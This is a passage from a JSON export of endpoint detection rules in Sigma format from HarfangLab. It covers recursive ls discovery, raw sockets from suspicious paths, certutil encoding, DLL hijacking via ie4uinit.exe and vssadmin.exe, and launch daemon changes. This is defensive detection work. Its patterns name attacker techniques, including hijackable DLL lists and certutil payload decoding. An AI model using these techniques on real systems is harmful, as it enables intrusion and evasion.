"attack.t1112" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "01ce3d93-1705-4c9f-a0f9-4c0e16af130b", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "low", "rule_effective_confidence": "moderate", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.613285Z", "creation_date": "2026-03-23T11:45:34.613289Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.613296Z", "rule_level": "low", "rule_confidence": "moderate", "rule_confidence_override": null, "references": [ "https://attack.mitre.org/techniques/T1083/", "https://attack.mitre.org/techniques/T1005/" ], "name": "t1083_recursive_ls_linux.yml", "content": "title: File and Directory Discovered via ls\nid: 01ce3d93-1705-4c9f-a0f9-4c0e16af130b\ndescription: |\n Detects the execution of ls with special arguments that may be used for file and directory discovery.\n Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n It is recommended to investigate the parent process for suspicious activities.\nreferences:\n - https://attack.mitre.org/techniques/T1083/\n - https://attack.mitre.org/techniques/T1005/\ndate: 2022/12/01\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1083\n - attack.t1005\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.Discovery\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/ls'\n\n # When the agent is under a lot of pressure, the parent information of a process can be missing.\n # Exceptionnaly for this rule, because it triggers so frequently with a low severity, we will ignore\n # its instances where the parent is missing.\n # When the parent is missing, the ParentImage or ParentCommandLine field is also missing (it is not empty or null)\n # so we can't easily match against that.\n # Instead, we reverse the problem by requiring the ParentImage fields to contain a `\\`.\n ParentImage|contains: '\\'\n\n selection_recursive:\n CommandLine|contains:\n - ' -R'\n - ' -?R'\n - ' -??R'\n - ' -???R'\n - ' -????R'\n - ' -?????R'\n\n selection_arg_all:\n CommandLine|contains:\n - ' -a'\n - ' -?a'\n - ' -??a'\n - ' -???a'\n - ' -????a'\n - ' -?????a'\n selection_arg_l:\n CommandLine|contains:\n - ' -l'\n - ' -?l'\n - ' -??l'\n - ' -???l'\n - ' -????l'\n - ' -?????l'\n\n exclusion_commandline:\n CommandLine:\n - '* --color=auto *'\n - 'ls --color=auto'\n - '* --color=tty *'\n - 'ls --color=tty'\n - 'ls --color -d .'\n - 'ls -? /proc/*'\n - 'ls -?? /proc/*'\n - 'ls -? /usr/*'\n - 'ls -? /var/*'\n - 'ls -?? /var/*'\n - 'ls -?? /run/*'\n - '/bin/ls -? /proc/*'\n - '/bin/ls -?? /proc/*'\n - '/bin/ls -? /usr/*'\n - '/bin/ls -? /var/*'\n - '/bin/ls -?? /var/*'\n - '/bin/ls -ld /run/*'\n - 'ls -l libreoffice'\n - '/bin/ls -l ./jre/bin/java'\n\n exclusion_qualys1:\n - GrandparentImage: '/usr/local/qualys/cloud-agent/bin/qualys-scan-util'\n - CommandLine:\n - '*/qualys/cloud-agent/*'\n - 'ls -ltr /var/log/qualys/*'\n exclusion_qualys2:\n CommandLine: 'ls -ld /root'\n ParentImage: '/usr/bin/bash'\n GrandparentImage: '/usr/bin/bash'\n exclusion_qualys3:\n GrandparentImage: '/usr/local/qualys/cloud-agent/bin/qualys-scan-util'\n CommandLine|startswith: 'ls -ld /root/'\n\n exclusion_bladelogic:\n ParentImage: '/opt/bmc/bladelogic/RSCD/bin/rscd_full'\n\n exclusion_ransomguard:\n CommandLine: 'ls -ld /root/.ransomguard.???'\n\n condition: selection and selection_recursive and 1 of selection_arg_* and not 1 of exclusion_*\nlevel: low\nconfidence: moderate", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "01ce3d93-1705-4c9f-a0f9-4c0e16af130b", "rule_name": "File and Directory Discovered via ls", "rule_description": "Detects the execution of ls with special arguments that may be used for file and directory discovery.\nAdversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\nIt is recommended to investigate the parent process for suspicious activities.\n", "rule_creation_date": "2022-12-01", "rule_modified_date": "2025-01-28", "rule_os": "linux", "rule_status": null, "rule_tactic_tags": [ "attack.discovery" ], "rule_technique_tags": [ "attack.t1005", "attack.t1083" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "01cf0e26-1674-4236-aa42-024891c8915c", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "moderate", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.085708Z", "creation_date": "2026-03-23T11:45:34.085710Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.085714Z", "rule_level": "high", "rule_confidence": "moderate", "rule_confidence_override": null, "references": [ "https://sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/", "https://man7.org/linux/man-pages/man7/raw.7.html", "https://man7.org/linux/man-pages/man7/packet.7.html", "https://attack.mitre.org/techniques/T1095/", "https://attack.mitre.org/techniques/T1040/" ], "name": "t1095_rawsocket_suspicious_path.yml", "content": "title: Raw Socket Created From Suspicious Path\nid: 01cf0e26-1674-4236-aa42-024891c8915c\ndescription: |\n Detects the creation of a raw socket from a suspicious path.\n Raw sockets are a special kind of socket that allow deep manipulation of network packets, either for inspection, filtering, custom protocols or packet forging.\n It may hint at a malware trying to hide its traffic without having to open a port or using a custom protocol to communicate with its C2.\n It is recommended to ensure the process who created this raw socket had a legitimate reason to do so and that the host wasn't compromised.\nreferences:\n - https://sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/\n - https://man7.org/linux/man-pages/man7/raw.7.html\n - https://man7.org/linux/man-pages/man7/packet.7.html\n - https://attack.mitre.org/techniques/T1095/\n - https://attack.mitre.org/techniques/T1040/\ndate: 2024/02/02\nmodified: 2026/02/25\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1095\n - attack.defense_evasion\n - attack.persistence\n - attack.t1205.001\n - attack.t1572\n - attack.credential_access\n - attack.discovery\n - attack.t1040\n - classification.Linux.Source.NetworkActivity\n - classification.Linux.Behavior.NetworkActivity\n - classification.Linux.Behavior.CommandAndControl\nlogsource:\n category: network_rawsocket\n product: linux\ndetection:\n\n selection:\n # Ensure that events without a process do not trigger this rule.\n # This happens typically when the agent is overloaded.\n ProcessImage|startswith:\n - '/'\n - 'memfd:'\n ProcessAncestors|contains: '?'\n\n # Filter common \"good\" directories to only retain the suspicious ones (/home, /tmp, /run, etc.)\n filter_system_directories:\n ProcessImage|startswith:\n - '/bin/'\n - '/sbin/'\n - '/usr/bin/'\n - '/usr/sbin/'\n - '/usr/local/'\n - '/opt/'\n - '/lib/'\n - '/lib64/'\n - '/usr/lib/'\n - '/usr/lib64/'\n - '/usr/libexec/'\n - '/usr/share/'\n - '/snap/'\n - '/var/lib/snapd/snap/'\n - '/nix/store/*/bin/'\n - '/nix/store/*/libexec/'\n\n exclusion_k3s:\n ProcessImage|startswith: '/var/lib/rancher/k3s/data/*/bin/'\n\n exclusion_container:\n - ProcessParentImage:\n - '/usr/bin/containerd-shim-runc-v2'\n - '/opt/containerd/bin/containerd-shim-runc-v2'\n - '/usr/local/bin/containerd-shim-runc-v2'\n - ProcessAncestors|contains:\n - '|/usr/bin/containerd-shim-runc-v2|'\n - '|/opt/containerd/bin/containerd-shim-runc-v2|'\n - '|/usr/local/bin/containerd-shim-runc-v2|'\n\n exclusion_u01:\n ProcessImage:\n - '/u01/app/*/bin/cping'\n - '/u01/app/*/bin/acquisition'\n - '/u01/app/*/bin/gyrophare'\n - '/u01/app/*/bin/orarootagent.bin'\n\n exclusion_tina:\n ProcessImage:\n - '*/tina/Bin/.tina_ping.real'\n - '/usr/Atempo/tina/Bin/*'\n - '/usr/Atempo/TimeNavigator/*'\n\n exclusion_devolonetsv:\n # /var/lib/devolonetsvc/updates/firmware/devolo-firmware-qca7420/avupdate\n ProcessImage: '/var/lib/devolonetsvc/updates/firmware/devolo-firmware-*/avupdate'\n\n exclusion_openprocess:\n ProcessImage: '/usr/openprocess/*/bin/ops?server'\n\n exclusion_hlab:\n ProcessImage|endswith: '/hl-ebpf-sweeper'\n\n exclusion_lacework_datacollector:\n # /var/lib/lacework/6.11.0.21858/datacollector\n # /var/lib/lacework/6.7.6.19823/datacollector\n ProcessImage: '/var/lib/lacework/*/datacollector'\n\n exclusion_azure_networkwatcher:\n # /var/lib/waagent/Microsoft.Azure.NetworkWatcher.NetworkWatcherAgentLinux-1.4.3320.1/amd64/NetworkWatcherAgent\n ProcessImage: '/var/lib/waagent/Microsoft.Azure.NetworkWatcher.NetworkWatcherAgentLinux-*/*/NetworkWatcherAgent'\n\n exclusion_ibm_hsm:\n ProcessImage:\n - '/usr/lpp/mmfs/bin/mmcmi'\n - '/usr/lpp/mmfs/bin/mmfsd'\n - '/usr/lpp/mmfs/libexec/ctdb/ctdb_killtcp'\n\n exclusion_veritas:\n ProcessImage:\n - '/usr/openv/volmgr/bin/avrd'\n - '/usr/openv/volmgr/bin/tldd'\n\n exclusion_nexpose_vulnscanner:\n ProcessCurrentDirectory: '/data/rapid7/nexpose/nsc/'\n\n exclusion_container_iptables:\n ProcessAncestors|contains: '/usr/bin/containerd'\n ProcessCommandLine:\n - '/system/bin/ip6tables-restore --noflush -w -v'\n - '/system/bin/iptables-restore --noflush -w -v'\n\n exclusion_uv_python:\n ProcessImage|contains: '/.local/share/uv/python/'\n\n exclusion_cortex:\n ProcessCommandLine: '/opt/traps/bin/pmd'\n\n exclusion_sensugo:\n ProcessAncestors|contains:\n - '|/opt/sensugo/bin/sensu-agent.v*|'\n - '|/opt/sensugo/bin/sensu-backend.v*|'\n\n exclusion_zygote:\n ProcessParentImage: '/system/bin/app_process64'\n\n exclusion_icsscand:\n ProcessImage|endswith: '/icsscand/build/libicsneo-socketcan-daemon'\n\n exclusion_iptables:\n ProcessImage: '/system/bin/iptables'\n\n exclusion_zig_benchmark:\n ProcessCommandLine: 'zig-out/bin/benchmark'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "01cf0e26-1674-4236-aa42-024891c8915c", "rule_name": "Raw Socket Created From Suspicious Path", "rule_description": "Detects the creation of a raw socket from a suspicious path.\nRaw sockets are a special kind of socket that allow deep manipulation of network packets, either for inspection, filtering, custom protocols or packet forging.\nIt may hint at a malware trying to hide its traffic without having to open a port or using a custom protocol to communicate with its C2.\nIt is recommended to ensure the process who created this raw socket had a legitimate reason to do so and that the host wasn't compromised.\n", "rule_creation_date": "2024-02-02", "rule_modified_date": "2026-02-25", "rule_os": "linux", "rule_status": null, "rule_tactic_tags": [ "attack.command_and_control", "attack.credential_access", "attack.defense_evasion", "attack.discovery", "attack.persistence" ], "rule_technique_tags": [ "attack.t1040", "attack.t1095", "attack.t1205.001", "attack.t1572" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "01f3ffc6-8407-4fda-972a-7d8066ec1e3b", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "moderate", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.078393Z", "creation_date": "2026-03-23T11:45:34.078395Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.078400Z", "rule_level": "high", "rule_confidence": "moderate", "rule_confidence_override": null, "references": [ "https://lolbas-project.github.io/lolbas/Binaries/Certutil/", "https://attack.mitre.org/techniques/T1140/" ], "name": "t1140_certutil_encoding_usage.yml", "content": "title: Certutil Used for Encoding\nid: 01f3ffc6-8407-4fda-972a-7d8066ec1e3b\ndescription: |\n Detects the execution of certutil.exe to decode or encode data.\n This is often used by attackers to decode binaries hidden inside certificate files as Base64 or Hexadecimal information.\n It is recommended to check the content of the written file and the activity of the parent process for malicious behavior.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Certutil/\n - https://attack.mitre.org/techniques/T1140/\ndate: 2021/05/27\nmodified: 2025/02/13\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.s0160\n - attack.t1140\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Certutil\n - classification.Windows.Behavior.Obfuscation\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\certutil.exe'\n # Renamed binaries\n - OriginalFileName: 'CertUtil.exe'\n\n selection_cmd:\n CommandLine|contains:\n # Decode to BASE64\n - ' -decode '\n - ' /decode '\n\n # Encode to BASE64\n - ' -encode '\n - ' /encode '\n\n # Decode from hexadecimal\n - ' -decodehex '\n - ' /decodehex '\n\n # Encode to hexadecimal\n - ' -encodehex '\n - ' /encodehex '\n\n exclusion_glpi1:\n # GLPI-Agent keystore-export\n CommandLine: 'certutil -encode *.crt temp.cer'\n # C:\\Program Files\\GLPI-Agent\\perl\\bin\\glpi-agent.exe\n GrandparentImage|endswith: '\\glpi-agent.exe'\n\n exclusion_glpi2:\n # GLPI-Agent keystore-export\n CommandLine:\n - 'certutil -encode *.crt temp.cer'\n - 'certutil -encode *.crt temp.cer ?'\n # C:\\Program Files\\GLPI-Agent\\perl\\bin\\glpi-agent.exe\n CurrentDirectory: '?:\\Program Files\\GLPI-Agent\\var\\keystore-export-*\\'\n\n exclusion_pfu_scansnap:\n ProcessGrandparentImage:\n - '?:\\Program Files (x86)\\PFU\\ScanSnap\\Home\\SshRegister.exe'\n - '?:\\Program Files (x86)\\PFU\\ScanSnap\\Driver\\PfuSsMon.exe'\n ProcessCommandLine: 'certutil -encodehex -f * content.json 1'\n\n exclusion_centralstage:\n ProcessGrandparentImage: '?:\\ProgramData\\CentraStage\\AEMAgent\\AEMAgent.exe'\n ProcessCommandLine: 'certutil -decode getsignatureinfo.base64 getsignatureinfo.ps1'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "01f3ffc6-8407-4fda-972a-7d8066ec1e3b", "rule_name": "Certutil Used for Encoding", "rule_description": "Detects the execution of certutil.exe to decode or encode data.\nThis is often used by attackers to decode binaries hidden inside certificate files as Base64 or Hexadecimal information.\nIt is recommended to check the content of the written file and the activity of the parent process for malicious behavior.\n", "rule_creation_date": "2021-05-27", "rule_modified_date": "2025-02-13", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion" ], "rule_technique_tags": [ "attack.t1140" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "022246ff-42f6-4d06-8173-3c88a407926a", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.592360Z", "creation_date": "2026-03-23T11:45:34.592363Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.592371Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://github.com/xforcered/WFH", "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_ie4uinit.yml", "content": "title: DLL Hijacking via ie4uinit.exe\nid: 022246ff-42f6-4d06-8173-3c88a407926a\ndescription: |\n Detects potential Windows DLL Hijacking via ie4uinit.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'ie4uinit.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CRYPTBASE.DLL'\n - '\\IEADVPACK.dll'\n - '\\iedkcs32.dll'\n - '\\MLANG.dll'\n - '\\netapi32.dll'\n - '\\netutils.dll'\n - '\\urlmon.dll'\n - '\\WININET.dll'\n - '\\wkscli.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "022246ff-42f6-4d06-8173-3c88a407926a", "rule_name": "DLL Hijacking via ie4uinit.exe", "rule_description": "Detects potential Windows DLL Hijacking via ie4uinit.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2021-12-10", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "0247bb14-5962-4133-9181-cb2f419787f1", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.093612Z", "creation_date": "2026-03-23T11:45:34.093614Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.093619Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://attack.mitre.org/techniques/T1543/004/" ], "name": "t1543_004_launch_daemons_modified.yml", "content": "title: Launch Daemon Modified\nid: 0247bb14-5962-4133-9181-cb2f419787f1\ndescription: |\n Detects a modification of a launch daemon.\n Adversaries may modify existing launch daemons in order to install a backdoor.\n It is recommended to check if the process making the modification has legitimate reasons to do so.\nreferences:\n - https://attack.mitre.org/techniques/T1543/004/\ndate: 2024/06/18\nmodified: 2025/10/29\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1543.004\n - attack.defense_evasion\n - attack.t1647\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.Persistence\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_version:\n # define minimum version for each branches\n - AgentVersion|gte|version: 3.6.13\n AgentVersion|lt|version: 3.7.0\n - AgentVersion|gte|version: 3.7.11\n AgentVersion|lt|version: 3.8.0\n - AgentVersion|gte|version: 3.8.3\n AgentVersion|lt|version: 3.9.0\n # all versions above are patched\n - AgentVersion|gte|version: 3.9.0\n\n selection_process:\n ProcessImage|contains: '?'\n\n selection_kind_write:\n Kind: 'write'\n Path|startswith:\n - '/System/Library/LaunchDaemons/'\n - '/Library/LaunchDaemons/'\n\n selection_kind_rename:\n Kind: 'rename'\n TargetPath|startswith:\n - '/System/Library/LaunchDaemons/'\n - '/Library/LaunchDaemons/'\n\n filter_nosync:\n Path|contains: '.dat.nosync'\n\n filter_ds_store:\n Path|endswith: '/.DS_Store'\n\n exclusion_vim:\n Image: '/usr/bin/vim'\n\n exclusion_jamf:\n - Image: '/usr/local/jamf/bin/jamf'\n - ProcessGrandparentImage: '/usr/local/jamf/bin/jamf'\n - ProcessGrandparentCommandLine|contains: '/Library/Application Support/JAMF/tmp/'\n\n exclusion_installer:\n - ProcessCommandLine|startswith:\n - '/bin/bash /tmp/PKInstallSandbox.??????/'\n - '/bin/sh /tmp/PKInstallSandbox.??????/'\n - '/bin/bash /tmp/pkinstallsandbox.??????/scripts/'\n - ProcessParentCommandLine|startswith:\n - '/bin/bash /tmp/PKInstallSandbox.??????/'\n - '/bin/sh /tmp/PKInstallSandbox.??????/'\n - '/bin/bash /tmp/pkinstallsandbox.??????/scripts/'\n\n # used by a lot of installer\n exclusion_cp:\n Image: '/bin/cp'\n\n exclusion_bomgar:\n ProcessCommandLine|startswith:\n - '/bin/bash /Library/LaunchDaemons/.com.bomgar.bomgar-ps-*/mac_service_helper.sh'\n - '/Library/LaunchDaemons/.com.bomgar.bomgar-ps-*.helper/run.state'\n\n exclusion_desktop_services_priv:\n ProcessCommandLine:\n - '/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper'\n - '/system/library/privateframeworks/desktopservicespriv.framework/versions/a/resources/desktopserviceshelper'\n\n exclusion_finder:\n Image: '/system/library/coreservices/finder.app/contents/macos/finder'\n\n exclusion_common_folders:\n ProcessImage|startswith:\n - '/Applications/'\n - '/Library/'\n - '/Users/*/Applications/'\n - '/Users/*/Library/'\n - '/private/var/folders/??/*/?/AppTranslocation/'\n\n exclusion_eset:\n ProcessGrandparentImage: '/Applications/ESET Endpoint Security.app/Contents/MacOS/execd'\n\n exclusion_rsync:\n Image: '/usr/bin/rsync'\n\n condition: selection_version and selection_process and 1 of selection_kind_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "0247bb14-5962-4133-9181-cb2f419787f1", "rule_name": "Launch Daemon Modified", "rule_description": "Detects a modification of a launch daemon.\nAdversaries may modify existing launch daemons in order to install a backdoor.\nIt is recommended to check if the process making the modification has legitimate reasons to do so.\n", "rule_creation_date": "2024-06-18", "rule_modified_date": "2025-10-29", "rule_os": "macos", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1543.004", "attack.t1647" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "027c5f6b-cba7-426c-af04-233b87967507", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.593375Z", "creation_date": "2026-03-23T11:45:34.593378Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.593386Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_vssadmin.yml", "content": "title: DLL Hijacking via vssadmin.exe\nid: 027c5f6b-cba7-426c-af04-233b87967507\ndescription: |\n Detects potential Windows DLL Hijacking via vssadmin.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'vssadmin.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\ATL.DLL'\n - '\\VSSAPI.DLL'\n - '\\VssTrace.DLL'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "027c5f6b-cba7-426c-af04-233b87967507", "rule_name": "DLL Hijacking via vssadmin.exe", "rule_description": "Detects potential Windows DLL Hijacking via vssadmin.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2021-12-10", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "029996a2-753c-4bd1-ac20-b8f180acbf90", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "medium", "rule_effective_confidence": "weak", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", 